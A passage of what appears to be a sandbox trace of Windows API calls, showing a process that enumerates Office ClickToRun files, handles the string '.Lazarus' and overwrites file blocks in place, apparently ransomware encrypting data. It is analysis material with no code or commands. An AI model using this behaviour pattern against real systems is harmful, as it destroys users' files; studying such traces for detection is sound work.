lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll", lpUsedDefaultChar=0x0) returned 74 [0074.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0074.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.748] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0074.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.748] AreFileApisANSI () returned 1 [0074.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0074.748] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85620 [0074.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x85620, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 74 [0074.748] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.748] GetFileType (hFile=0x430) returned 0x1 [0074.749] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85620 | out: hHeap=0x20000) returned 1 [0074.749] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.749] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.749] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.749] CloseHandle (hObject=0x430) returned 1 [0074.749] AreFileApisANSI () returned 1 [0074.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0074.749] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85580 [0074.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cfa8, cbMultiByte=-1, lpWideCharStr=0x85580, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll") returned 74 [0074.749] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVCatalog.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcatalog.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0074.750] GetLastError () returned 0x20 [0074.750] GetLastError () returned 0x20 [0074.750] SetLastError (dwErrCode=0x20) [0074.750] GetLastError () returned 0x20 [0074.750] SetLastError (dwErrCode=0x20) [0074.750] GetLastError () returned 0x20 [0074.750] SetLastError (dwErrCode=0x20) [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85580 | out: hHeap=0x20000) returned 1 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0074.750] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.750] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.750] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x1f5ad8, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="appvcleaner.exe", cAlternateFileName="APPVCL~1.EXE")) returned 1 [0074.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0074.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0074.750] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0074.750] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0074.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0074.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e470 [0074.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x5a6b8 [0074.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e470 | out: hHeap=0x20000) returned 1 [0074.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0074.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0074.751] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.751] AreFileApisANSI () returned 1 [0074.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe", lpUsedDefaultChar=0x0) returned 74 [0074.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0074.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.751] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0074.751] AreFileApisANSI () returned 1 [0074.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0074.751] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x851c0 [0074.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x851c0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 74 [0074.751] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.752] GetFileType (hFile=0x430) returned 0x1 [0074.752] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x851c0 | out: hHeap=0x20000) returned 1 [0074.752] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.752] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.752] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.752] CloseHandle (hObject=0x430) returned 1 [0074.752] AreFileApisANSI () returned 1 [0074.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0074.752] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85940 [0074.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85940, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 74 [0074.753] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.753] GetFileType (hFile=0x430) returned 0x1 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85940 | out: hHeap=0x20000) returned 1 [0074.753] CloseHandle (hObject=0x430) returned 1 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0074.753] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.753] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.754] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.754] AreFileApisANSI () returned 1 [0074.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0074.754] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85b20 [0074.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6ce48, cbMultiByte=-1, lpWideCharStr=0x85b20, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 74 [0074.754] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x9cf13f00, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x1f5ad8)) returned 1 [0074.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85b20 | out: hHeap=0x20000) returned 1 [0074.755] AreFileApisANSI () returned 1 [0074.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x313f4e8, cbMultiByte=-1, lpWideCharStr=0x313f500, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0074.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.755] GetLastError () returned 0x0 [0074.755] SetLastError (dwErrCode=0x0) [0074.755] AreFileApisANSI () returned 1 [0074.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0074.755] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85080 [0074.755] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 74 [0074.755] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134e8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.755] GetFileType (hFile=0x430) returned 0x1 [0074.755] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0074.755] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3113594 | out: lpNewFilePointer=0x0) returned 1 [0074.755] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113570, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113570*=0x15000, lpOverlapped=0x0) returned 1 [0074.758] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0074.758] ReadFile (in: hFile=0x430, lpBuffer=0x91458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesRead=0x3113518*=0x1000, lpOverlapped=0x0) returned 1 [0074.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0074.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0074.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0074.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x92460 [0074.759] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b8b0 [0074.759] GetLastError () returned 0x0 [0074.759] SetLastError (dwErrCode=0x0) [0074.759] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.760] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0074.760] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0074.760] WriteFile (in: hFile=0x430, lpBuffer=0x91458*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0074.760] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0074.760] CloseHandle (hObject=0x430) returned 1 [0075.421] AreFileApisANSI () returned 1 [0075.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0075.422] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85080 [0075.422] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d580, cbMultiByte=-1, lpWideCharStr=0x85080, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe") returned 74 [0075.422] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\appvcleaner.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvcleaner.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x31134d0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0075.428] GetFileType (hFile=0x430) returned 0x1 [0075.428] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85080 | out: hHeap=0x20000) returned 1 [0075.428] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x311357c | out: lpNewFilePointer=0x0) returned 1 [0075.428] ReadFile (in: hFile=0x430, lpBuffer=0x3113750, nNumberOfBytesToRead=0x15000, lpNumberOfBytesRead=0x3113558, lpOverlapped=0x0 | out: lpBuffer=0x3113750*, lpNumberOfBytesRead=0x3113558*=0x15000, lpOverlapped=0x0) returned 1 [0075.434] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x91458 [0075.434] ReadFile (in: hFile=0x430, lpBuffer=0x91458, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3113500, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesRead=0x3113500*=0x1000, lpOverlapped=0x0) returned 1 [0075.435] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0075.435] GetLastError () returned 0x0 [0075.435] SetLastError (dwErrCode=0x0) [0075.435] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0075.435] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0xdbba0, lpNewFilePointer=0x0, dwMoveMethod=0x31135a8 | out: lpNewFilePointer=0x0) returned 1 [0075.435] WriteFile (in: hFile=0x430, lpBuffer=0x31296e0*, nNumberOfBytesToWrite=0x15000, lpNumberOfBytesWritten=0x3113518, lpOverlapped=0x0 | out: lpBuffer=0x31296e0*, lpNumberOfBytesWritten=0x3113518*=0x15000, lpOverlapped=0x0) returned 1 [0075.435] WriteFile (in: hFile=0x430, lpBuffer=0x91458*, nNumberOfBytesToWrite=0xf90, lpNumberOfBytesWritten=0x3113560, lpOverlapped=0x0 | out: lpBuffer=0x91458*, lpNumberOfBytesWritten=0x3113560*=0xf90, lpOverlapped=0x0) returned 1 [0075.436] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x91458 | out: hHeap=0x20000) returned 1 [0075.436] CloseHandle (hObject=0x430) returned 1 [0075.714] 